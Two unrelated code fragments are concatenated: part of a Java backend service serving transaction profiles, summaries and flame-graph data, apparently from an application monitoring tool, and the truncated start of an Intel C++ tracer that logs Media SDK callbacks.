getQueryText(@BindAgentRollupId String agentRollupId, @BindRequest FullQueryTextRequest request) throws Exception { String fullQueryText = transactionCommonService.readFullQueryText(agentRollupId, request.fullTextSha1()); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); if (fullQueryText == null) { jg.writeBooleanField("expired", true); } else { jg.writeStringField("fullText", fullQueryText); } jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/service-calls", permission = "agent:transaction:serviceCalls") String getServiceCalls(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.SERVICE_CALL); ServiceCallCollector serviceCallCollector = transactionCommonService.getMergedServiceCalls(agentRollupId, query); List<MutableServiceCall> serviceCalls = serviceCallCollector.getSortedAndTruncatedServiceCalls(); if (serviceCalls.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); serviceCallCollector = transactionCommonService.getMergedServiceCalls(agentRollupId, query); serviceCalls = serviceCallCollector.getSortedAndTruncatedServiceCalls(); if (ignoreFallBackData(query, serviceCallCollector.getLastCaptureTime())) { // this is probably data from before the requested time period serviceCalls = ImmutableList.of(); } } List<ServiceCall> serviceCallList = Lists.newArrayList(); for (MutableServiceCall loopServiceCall : serviceCalls) { serviceCallList.add(ImmutableServiceCall.builder() .type(loopServiceCall.getType()) .text(loopServiceCall.getText()) .totalDurationNanos(loopServiceCall.getTotalDurationNanos()) .executionCount(loopServiceCall.getExecutionCount()) .build()); } Collections.sort(serviceCallList, new Comparator<ServiceCall>() { @Override public int compare(ServiceCall left, ServiceCall right) { // sort descending return Doubles.compare(right.totalDurationNanos(), left.totalDurationNanos()); } }); if (serviceCallList.isEmpty() && aggregateRepository.shouldHaveServiceCalls(agentRollupId, query)) { return "{\"overwritten\":true}"; } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeObject(serviceCallList); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/profile", permission = "agent:transaction:threadProfile") String getProfile(@BindAgentRollupId String agentRollupId, @BindRequest TransactionProfileRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.PROFILE); ProfileCollector profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); MutableProfile profile = profileCollector.getProfile(); if (profile.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (ignoreFallBackData(query, profileCollector.getLastCaptureTime())) { // this is probably data from before the requested time period profile = new MutableProfile(); } } boolean hasUnfilteredMainThreadProfile; boolean hasUnfilteredAuxThreadProfile; if (request.auxiliary()) { hasUnfilteredMainThreadProfile = transactionCommonService.hasMainThreadProfile(agentRollupId, query); hasUnfilteredAuxThreadProfile = profile.getUnfilteredSampleCount() > 0; } else { if (profile.getUnfilteredSampleCount() == 0) { hasUnfilteredMainThreadProfile = false; // return and display aux profile instead profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, true, request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (profile.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently // changed query = withLargestRollupLevel(query); profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (ignoreFallBackData(query, profileCollector.getLastCaptureTime())) { // this is probably data from before the requested time period profile = new MutableProfile(); } } hasUnfilteredAuxThreadProfile = profile.getUnfilteredSampleCount() > 0; } else { hasUnfilteredMainThreadProfile = true; hasUnfilteredAuxThreadProfile = transactionCommonService.hasAuxThreadProfile(agentRollupId, query); } } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeBooleanField("hasUnfilteredMainThreadProfile", hasUnfilteredMainThreadProfile); jg.writeBooleanField("hasUnfilteredAuxThreadProfile", hasUnfilteredAuxThreadProfile); if (profile.getUnfilteredSampleCount() == 0 && isProfileOverwritten(request, agentRollupId, query)) { jg.writeBooleanField("overwritten", true); } jg.writeFieldName("profile"); profile.writeJson(jg); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/summaries", permission = "agent:transaction:overview") String getSummaries(@BindAgentRollupId String agentRollupId, @BindRequest TransactionSummaryRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { SummaryQuery query = ImmutableSummaryQuery.builder() .transactionType(request.transactionType()) .from(request.from()) .to(request.to()) .rollupLevel(rollupLevelService.getRollupLevelForView(request.from(), request.to(), DataKind.GENERAL)) .build(); OverallSummaryCollector overallSummaryCollector = transactionCommonService.readOverallSummary(agentRollupId, query, autoRefresh); OverallSummary overallSummary = overallSummaryCollector.getOverallSummary(); if (overallSummary.transactionCount() == 0 && fallBackToLargestAggregate(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); overallSummaryCollector = transactionCommonService.readOverallSummary(agentRollupId, query, autoRefresh); overallSummary = overallSummaryCollector.getOverallSummary(); if (ignoreFallBackData(query, overallSummaryCollector.getLastCaptureTime())) { // this is probably data from before the requested time period overallSummary = ImmutableOverallSummary.builder() .totalDurationNanos(0) .transactionCount(0) .build(); } } Result<TransactionNameSummary> queryResult = transactionCommonService .readTransactionNameSummaries(agentRollupId, query, request.sortOrder(), request.limit(), autoRefresh); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("overall", overallSummary); jg.writeObjectField("transactions", queryResult.records()); jg.writeBooleanField("moreAvailable", queryResult.moreAvailable()); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/flame-graph", permission = "agent:transaction:threadProfile") String getFlameGraph(@BindAgentRollupId String agentRollupId, @BindRequest FlameGraphRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.PROFILE); ProfileCollector profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); MutableProfile profile = profileCollector.getProfile(); if (profile.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (ignoreFallBackData(query, profileCollector.getLastCaptureTime())) { // this is probably data from before the requested time period profile = new MutableProfile(); } } return profile.toFlameGraphJson(); } @GET(path = "/backend/transaction/traces/flame-graph", permission = "agent:trace") String getTraceFlameGraph(@BindAgentId String agentId, @BindRequest TraceFlameGraphRequest request) throws Exception { Profile profile; if (request.auxiliary()) { profile = traceCommonService.getAuxThreadProfile(agentId, request.traceId(), request.checkLiveTraces()); } else { profile = traceCommonService.getMainThreadProfile(agentId, request.traceId(), request.checkLiveTraces()); } MutableProfile mutableProfile = new MutableProfile(); if (profile != null) { mutableProfile.merge(profile); } mutableProfile.truncateBranches(request.truncateBranchPercentage()); return mutableProfile.toFlameGraphJson(); } private AggregateQuery toChartQuery(RequestBase request, DataKind dataKind) throws Exception { int rollupLevel = rollupLevelService.getRollupLevelForView(request.from(), request.to(), dataKind); long rollupIntervalMillis = configRepository.getRollupConfigs().get(rollupLevel).intervalMillis(); // read the closest rollup to the left and right of chart, in order to display line sloping // correctly off the chart to the left and right long from = RollupLevelService.getFloorRollupTime(request.from(), rollupIntervalMillis); long to = RollupLevelService.getCeilRollupTime(request.to(), rollupIntervalMillis); return ImmutableAggregateQuery.builder() .transactionType(request.transactionType()) .transactionName(request.transactionName()) .from(from) .to(to) .rollupLevel(rollupLevel) .build(); } private AggregateQuery toQuery(RequestBase request, DataKind dataKind) throws Exception { return ImmutableAggregateQuery.builder() .transactionType(request.transactionType()) .transactionName(request.transactionName()) .from(request.from()) .to(request.to()) .rollupLevel(rollupLevelService.getRollupLevelForView(request.from(), request.to(), dataKind)) .build(); } private boolean fallBackToLargestAggregates(AggregateQuery query) { return query.rollupLevel() < getLargestRollupLevel() && query.from() < clock.currentTimeMillis() - getLargestRollupIntervalMillis() * 2; } private boolean fallBackToLargestAggregate(SummaryQuery query) { return query.rollupLevel() < getLargestRollupLevel() && query.from() < clock.currentTimeMillis() - getLargestRollupIntervalMillis() * 2; } private AggregateQuery withLargestRollupLevel(AggregateQuery query) { return ImmutableAggregateQuery.builder() .copyFrom(query) .rollupLevel(getLargestRollupLevel()) .build(); } private SummaryQuery withLargestRollupLevel(SummaryQuery query) { return ImmutableSummaryQuery.builder() .copyFrom(query) .rollupLevel(getLargestRollupLevel()) .build(); } private boolean ignoreFallBackData(AggregateQuery query, long lastCaptureTime) { return lastCaptureTime < query.from() + getLargestRollupIntervalMillis(); } private boolean ignoreFallBackData(SummaryQuery query, long lastCaptureTime) { return lastCaptureTime < query.from() + getLargestRollupIntervalMillis(); } private int getLargestRollupLevel() { return configRepository.getRollupConfigs().size() - 1; } private long getLargestRollupIntervalMillis() { List<RollupConfig> rollupConfigs = configRepository.getRollupConfigs(); return rollupConfigs.get(rollupConfigs.size() - 1).intervalMillis(); } private boolean isProfileOverwritten(TransactionProfileRequest request, String agentRollupId, AggregateQuery query) throws Exception { if (request.auxiliary() && aggregateRepository.shouldHaveAuxThreadProfile(agentRollupId, query)) { return true; } if (!request.auxiliary() && aggregateRepository.shouldHaveMainThreadProfile(agentRollupId, query)) { return true; } return false; } private static PercentileData getDataSeriesForPercentileChart( TransactionPercentileRequest request, List<PercentileAggregate> percentileAggregates, List<Double> percentiles, long dataPointIntervalMillis, long liveCaptureTime) { if (percentileAggregates.isEmpty()) { return ImmutablePercentileData.builder() .mergedAggregate(ImmutablePercentileMergedAggregate.builder() .transactionCount(0) .totalDurationNanos(0) .build()) .build(); } DataSeriesHelper dataSeriesHelper = new DataSeriesHelper(liveCaptureTime, dataPointIntervalMillis); List<DataSeries> dataSeriesList = Lists.newArrayList(); for (double percentile : percentiles) { dataSeriesList .add(new DataSeries(Utils.getPercentileWithSuffix(percentile) + " percentile")); } long transactionCount = 0; double totalDurationNanos = 0; LazyHistogram mergedHistogram = new LazyHistogram(); PercentileAggregate priorPercentileAggregate = null; for (PercentileAggregate percentileAggregate : percentileAggregates) { long captureTime = percentileAggregate.captureTime(); if (priorPercentileAggregate == null) { // first aggregate dataSeriesHelper.addInitialUpslopeIfNeeded(request.from(), captureTime, dataSeriesList, null); } else { dataSeriesHelper.addGapIfNeeded(priorPercentileAggregate.captureTime(), captureTime, dataSeriesList, null); } LazyHistogram durationNanosHistogram = new LazyHistogram(percentileAggregate.durationNanosHistogram()); for (int i = 0; i < percentiles.size(); i++) { DataSeries dataSeries = dataSeriesList.get(i); double percentile = percentiles.get(i); // convert to milliseconds dataSeries.add(captureTime, durationNanosHistogram.getValueAtPercentile(percentile) / NANOSECONDS_PER_MILLISECOND); } // TODO more precise aggregate when from/to not on rollup grid if (captureTime > request.from() && captureTime <= request.to()) { transactionCount += percentileAggregate.transactionCount(); totalDurationNanos += percentileAggregate.totalDurationNanos(); mergedHistogram.merge(durationNanosHistogram); } priorPercentileAggregate = percentileAggregate; } if (priorPercentileAggregate != null) { dataSeriesHelper.addFinalDownslopeIfNeeded(dataSeriesList, null, priorPercentileAggregate.captureTime()); } List<PercentileValue> percentileValues = Lists.newArrayList(); for (double percentile : percentiles) { percentileValues.add(ImmutablePercentileValue.of( Utils.getPercentileWithSuffix(percentile) + " percentile", mergedHistogram.getValueAtPercentile(percentile))); } return ImmutablePercentileData.builder() .dataSeriesList(dataSeriesList) .mergedAggregate(ImmutablePercentileMergedAggregate.builder() .transactionCount(transactionCount) .totalDurationNanos(totalDurationNanos) .addAllPercentileValues(percentileValues) .build()) .build(); } private static List<DataSeries> getDataSeriesForThroughputChart(TransactionDataRequest request, List<ThroughputAggregate> throughputAggregates, long dataPointIntervalMillis, long liveCaptureTime) { if (throughputAggregates.isEmpty()) { return Lists.newArrayList(); } DataSeriesHelper dataSeriesHelper = new DataSeriesHelper(liveCaptureTime, dataPointIntervalMillis); DataSeries dataSeries = new DataSeries("throughput"); List<DataSeries> dataSeriesList = Lists.newArrayList(dataSeries); ThroughputAggregate priorThroughputAggregate = null; for (ThroughputAggregate throughputAggregate : throughputAggregates) { if (priorThroughputAggregate == null) { // first aggregate dataSeriesHelper.addInitialUpslopeIfNeeded(request.from(), throughputAggregate.captureTime(), dataSeriesList, null); } else { dataSeriesHelper.addGapIfNeeded(priorThroughputAggregate.captureTime(), throughputAggregate.captureTime(), dataSeriesList, null); } long from = throughputAggregate.captureTime() - dataPointIntervalMillis; // this math is to deal with live aggregate from = CaptureTimes.getRollup(from, dataPointIntervalMillis); double transactionsPerMin = 60000.0 * throughputAggregate.transactionCount() / (throughputAggregate.captureTime() - from); dataSeries.add(throughputAggregate.captureTime(), transactionsPerMin); priorThroughputAggregate = throughputAggregate; } if (priorThroughputAggregate != null) { dataSeriesHelper.addFinalDownslopeIfNeeded(dataSeriesList, null, priorThroughputAggregate.captureTime()); } return dataSeriesList; } private static List<DataSeries> getDataSeriesForTimerChart(TransactionDataRequest request, List<OverviewAggregate> aggregates, long dataPointIntervalMillis, long liveCaptureTime) { if (aggregates.isEmpty()) { return Lists.newArrayList(); } List<StackedPoint> stackedPoints = Lists.newArrayList(); for (OverviewAggregate aggregate : aggregates) { stackedPoints.add(StackedPoint.create(aggregate)); } return getTimerDataSeries(request, stackedPoints, dataPointIntervalMillis, liveCaptureTime); } private static List<DataSeries> getTimerDataSeries(TransactionDataRequest request, List<StackedPoint> stackedPoints, long dataPointIntervalMillis, long liveCaptureTime) { DataSeriesHelper dataSeriesHelper = new DataSeriesHelper(liveCaptureTime, dataPointIntervalMillis); final int topX = 5; List<String> timerNames = getTopTimerNames(stackedPoints, topX + 1); List<DataSeries> dataSeriesList = Lists.newArrayList(); for (int i = 0; i < Math.min(timerNames.size(), topX); i++) { dataSeriesList.add(new DataSeries(timerNames.get(i))); } // need 'other' data series even if < topX timers in order to capture root timers, // e.g. time spent in 'servlet' timer but not in any nested timer DataSeries otherDataSeries = new DataSeries(null); OverviewAggregate priorOverviewAggregate = null; for (StackedPoint stackedPoint : stackedPoints) { OverviewAggregate overviewAggregate = stackedPoint.getOverviewAggregate(); if (priorOverviewAggregate == null) { // first aggregate dataSeriesHelper.addInitialUpslopeIfNeeded(request.from(), overviewAggregate.captureTime(), dataSeriesList, otherDataSeries); } else { dataSeriesHelper.addGapIfNeeded(priorOverviewAggregate.captureTime(), overviewAggregate.captureTime(), dataSeriesList, otherDataSeries); } MutableDoubleMap<String> stackedTimers = stackedPoint.getStackedTimers(); double totalOtherNanos = overviewAggregate.totalDurationNanos(); for (DataSeries dataSeries : dataSeriesList) { MutableDouble totalNanos = stackedTimers.get(dataSeries.getName()); if (totalNanos == null) { dataSeries.add(overviewAggregate.captureTime(), 0); } else { // convert to average milliseconds double value = (totalNanos.doubleValue() / overviewAggregate.transactionCount()) / NANOSECONDS_PER_MILLISECOND; dataSeries.add(overviewAggregate.captureTime(), value); totalOtherNanos -= totalNanos.doubleValue(); } } if (overviewAggregate.transactionCount() == 0) { otherDataSeries.add(overviewAggregate.captureTime(), 0); } else { // convert to average milliseconds otherDataSeries.add(overviewAggregate.captureTime(), (totalOtherNanos / overviewAggregate.transactionCount()) / NANOSECONDS_PER_MILLISECOND); } priorOverviewAggregate = overviewAggregate; } if (priorOverviewAggregate != null) { dataSeriesHelper.addFinalDownslopeIfNeeded(dataSeriesList, otherDataSeries, priorOverviewAggregate.captureTime()); } dataSeriesList.add(otherDataSeries); return dataSeriesList; } private static Map<Long, Long> getTransactionCounts( List<OverviewAggregate> overviewAggregates) { Map<Long, Long> transactionCounts = Maps.newHashMap(); for (OverviewAggregate overviewAggregate : overviewAggregates) { transactionCounts.put(overviewAggregate.captureTime(), overviewAggregate.transactionCount()); } return transactionCounts; } private static Map<Long, Long> getTransactionCounts2( List<PercentileAggregate> percentileAggregates) { Map<Long, Long> transactionCounts = Maps.newHashMap(); for (PercentileAggregate percentileAggregate : percentileAggregates) { transactionCounts.put(percentileAggregate.captureTime(), percentileAggregate.transactionCount()); } return transactionCounts; } // calculate top 5 timers private static List<String> getTopTimerNames(List<StackedPoint> stackedPoints, int topX) { MutableDoubleMap<String> timerTotals = new MutableDoubleMap<String>(); for (StackedPoint stackedPoint : stackedPoints) { for (Map.Entry<String, MutableDouble> entry : stackedPoint.getStackedTimers() .entrySet()) { timerTotals.add(entry.getKey(), entry.getValue().doubleValue()); } } Ordering<Map.Entry<String, MutableDouble>> valueOrdering = Ordering.natural() .onResultOf(new Function<Map.Entry<String, MutableDouble>, Double>() { @Override public Double apply( Map. /*@Nullable*/ Entry<String, MutableDouble> entry) { checkNotNull(entry); return entry.getValue().doubleValue(); } }); List<String> timerNames = Lists.newArrayList(); @SuppressWarnings("assignment.type.incompatible") List<Map.Entry<String, MutableDouble>> topTimerTotals = valueOrdering.greatestOf(timerTotals.entrySet(), topX); for (Map.Entry<String, MutableDouble> entry : topTimerTotals) { timerNames.add(entry.getKey()); } return timerNames; } private static class StackedPoint { private final OverviewAggregate overviewAggregate; // stacked timer values only include time spent as a leaf node in the timer tree private final MutableDoubleMap<String> stackedTimers; private static StackedPoint create(OverviewAggregate overviewAggregate) { MutableDoubleMap<String> stackedTimers = new MutableDoubleMap<String>(); for (Aggregate.Timer rootTimer : overviewAggregate.mainThreadRootTimers()) { // skip root timers for (Aggregate.Timer topLevelTimer : rootTimer.getChildTimerList()) { // traverse tree starting at top-level (under root) timers addToStackedTimer(topLevelTimer, stackedTimers); } } return new StackedPoint(overviewAggregate, stackedTimers); } private StackedPoint(OverviewAggregate overviewAggregate, MutableDoubleMap<String> stackedTimers) { this.overviewAggregate = overviewAggregate; this.stackedTimers = stackedTimers; } private OverviewAggregate getOverviewAggregate() { return overviewAggregate; } private MutableDoubleMap<String> getStackedTimers() { return stackedTimers; } private static void addToStackedTimer(Aggregate.Timer timer, MutableDoubleMap<String> stackedTimers) { double totalNestedNanos = 0; for (Aggregate.Timer childTimer : timer.getChildTimerList()) { totalNestedNanos += childTimer.getTotalNanos(); addToStackedTimer(childTimer, stackedTimers); } String timerName = timer.getName(); stackedTimers.add(timerName, timer.getTotalNanos() - totalNestedNanos); } } // by using MutableDouble, two operations (get/put) are not required for each increment, // instead just a single get is needed (except for first delta) @SuppressWarnings("serial") private static class MutableDoubleMap<K> extends HashMap<K, MutableDouble> { private void add(K key, double delta) { MutableDouble existing = get(key); if (existing == null) { put(key, new MutableDouble(delta)); } else { existing.value += delta; } } } private static class MutableDouble { private double value; private MutableDouble(double value) { this.value = value; } private double doubleValue() { return value; } } @Value.Immutable interface TransactionSummaryRequest { String transactionType(); long from(); long to(); SummarySortOrder sortOrder(); int limit(); } interface RequestBase { String transactionType(); @Nullable String transactionName(); long from(); long to(); } @Value.Immutable interface TransactionDataRequest extends RequestBase {} @Value.Immutable interface TransactionPercentileRequest extends RequestBase { // singular because this is used in query string ImmutableList<Double> percentile(); } @Value.Immutable interface FullQueryTextRequest { String fullTextSha1(); } @Value.Immutable interface TransactionProfileRequest extends RequestBase { boolean auxiliary(); // intentionally not plural since maps from query string ImmutableList<String> include(); // intentionally not plural since maps from query string ImmutableList<String> exclude(); double truncateBranchPercentage(); } @Value.Immutable interface FlameGraphRequest extends RequestBase { boolean auxiliary(); // intentionally not plural since maps from query string ImmutableList<String> include(); // intentionally not plural since maps from query string ImmutableList<String> exclude(); double truncateBranchPercentage(); } @Value.Immutable abstract static class TraceFlameGraphRequest { abstract String traceId(); abstract boolean auxiliary(); // intentionally not plural since maps from query string abstract ImmutableList<String> include(); // intentionally not plural since maps from query string abstract ImmutableList<String> exclude(); abstract double truncateBranchPercentage(); @Value.Default boolean checkLiveTraces() { return false; } } @Value.Immutable interface Query { String queryType(); String truncatedQueryText(); @Nullable String fullQueryTextSha1(); double totalDurationNanos(); long executionCount(); @Nullable Long totalRows(); } @Value.Immutable interface ServiceCall { String type(); String text(); double totalDurationNanos(); long executionCount(); } @Value.Immutable interface PercentileData { ImmutableList<DataSeries> dataSeriesList(); PercentileMergedAggregate mergedAggregate(); } @Value.Immutable interface PercentileMergedAggregate { long transactionCount(); // aggregates use double instead of long to avoid (unlikely) 292 year nanosecond rollover double totalDurationNanos(); ImmutableList<PercentileValue> percentileValues(); } }
19,505
782
/* ****************************************************************************** *\ Copyright (C) 2012-2020 Intel Corporation. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. - Neither the name of Intel Corporation nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. File Name: mfx_video_user.cpp \* ****************************************************************************** */ #include <exception> #include <iostream> #include "../loggers/timer.h" #include "../tracer/functions_table.h" #include "mfx_structures.h" #if TRACE_CALLBACKS mfxStatus mfxCoreInterface_GetCoreParam(mfxHDL _pthis, mfxCoreParam *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetCoreParam_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetCoreParam(mfxHDL pthis=" + ToString(pthis) + ", mfxCoreParam* par=" + ToString(par) + ") +"); fmfxCoreInterface_GetCoreParam proc = (fmfxCoreInterface_GetCoreParam)loader->callbacks[emfxCoreInterface_GetCoreParam_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetCoreParam called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxCoreInterface::GetCoreParam(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetHandle(mfxHDL _pthis, mfxHandleType type, mfxHDL *handle) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetHandle_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetHandle(mfxHDL pthis=" + ToString(pthis) + ", mfxHandleType type=" + ToString(type) + ", mfxHDL *handle=" + ToString(handle) + ") +"); fmfxCoreInterface_GetHandle proc = (fmfxCoreInterface_GetHandle)loader->callbacks[emfxCoreInterface_GetHandle_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (handle) Log::WriteLog(context.dump("handle", *handle)); Timer t; mfxStatus status = (*proc) (pthis, type, handle); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetHandle called"); if (handle) Log::WriteLog(context.dump("handle", *handle)); Log::WriteLog("callback: mfxCoreInterface::GetHandle(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_IncreaseReference(mfxHDL _pthis, mfxFrameData *fd) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_IncreaseReference_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::IncreaseReference(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameData *fd=" + ToString(fd) + ") +"); fmfxCoreInterface_IncreaseReference proc = (fmfxCoreInterface_IncreaseReference)loader->callbacks[emfxCoreInterface_IncreaseReference_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (fd) Log::WriteLog(context.dump("fd", *fd)); Timer t; mfxStatus status = (*proc) (pthis, fd); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::IncreaseReference called"); if (fd) Log::WriteLog(context.dump("fd", *fd)); Log::WriteLog("callback: mfxCoreInterface::IncreaseReference(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_DecreaseReference(mfxHDL _pthis, mfxFrameData *fd) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_DecreaseReference_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::DecreaseReference(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameData *fd=" + ToString(fd) + ") +"); fmfxCoreInterface_DecreaseReference proc = (fmfxCoreInterface_DecreaseReference)loader->callbacks[emfxCoreInterface_DecreaseReference_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (fd) Log::WriteLog(context.dump("fd", *fd)); Timer t; mfxStatus status = (*proc) (pthis, fd); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::DecreaseReference called"); if (fd) Log::WriteLog(context.dump("fd", *fd)); Log::WriteLog("callback: mfxCoreInterface::DecreaseReference(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_CopyFrame(mfxHDL _pthis, mfxFrameSurface1 *dst, mfxFrameSurface1 *src) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_CopyFrame_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::CopyFrame(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *dst=" + ToString(dst) + ", mfxFrameSurface1 *src=" + ToString(src) + ") +"); fmfxCoreInterface_CopyFrame proc = (fmfxCoreInterface_CopyFrame)loader->callbacks[emfxCoreInterface_CopyFrame_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (dst) Log::WriteLog(context.dump("dst", *dst)); if (src) Log::WriteLog(context.dump("src", *src)); Timer t; mfxStatus status = (*proc) (pthis, dst, src); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::CopyFrame called"); Log::WriteLog("callback: mfxCoreInterface::CopyFrame(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_CopyBuffer(mfxHDL _pthis, mfxU8 *dst, mfxU32 size, mfxFrameSurface1 *src) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_CopyBuffer_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::CopyBuffer(mfxHDL pthis=" + ToString(pthis) + ", mfxU8 *dst=" + ToString(dst) + ", mfxU32 size=" + ToString(size) + ", mfxFrameSurface1 *src=" + ToString(src) + ") +"); fmfxCoreInterface_CopyBuffer proc = (fmfxCoreInterface_CopyBuffer)loader->callbacks[emfxCoreInterface_CopyBuffer_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (src) Log::WriteLog(context.dump("src", 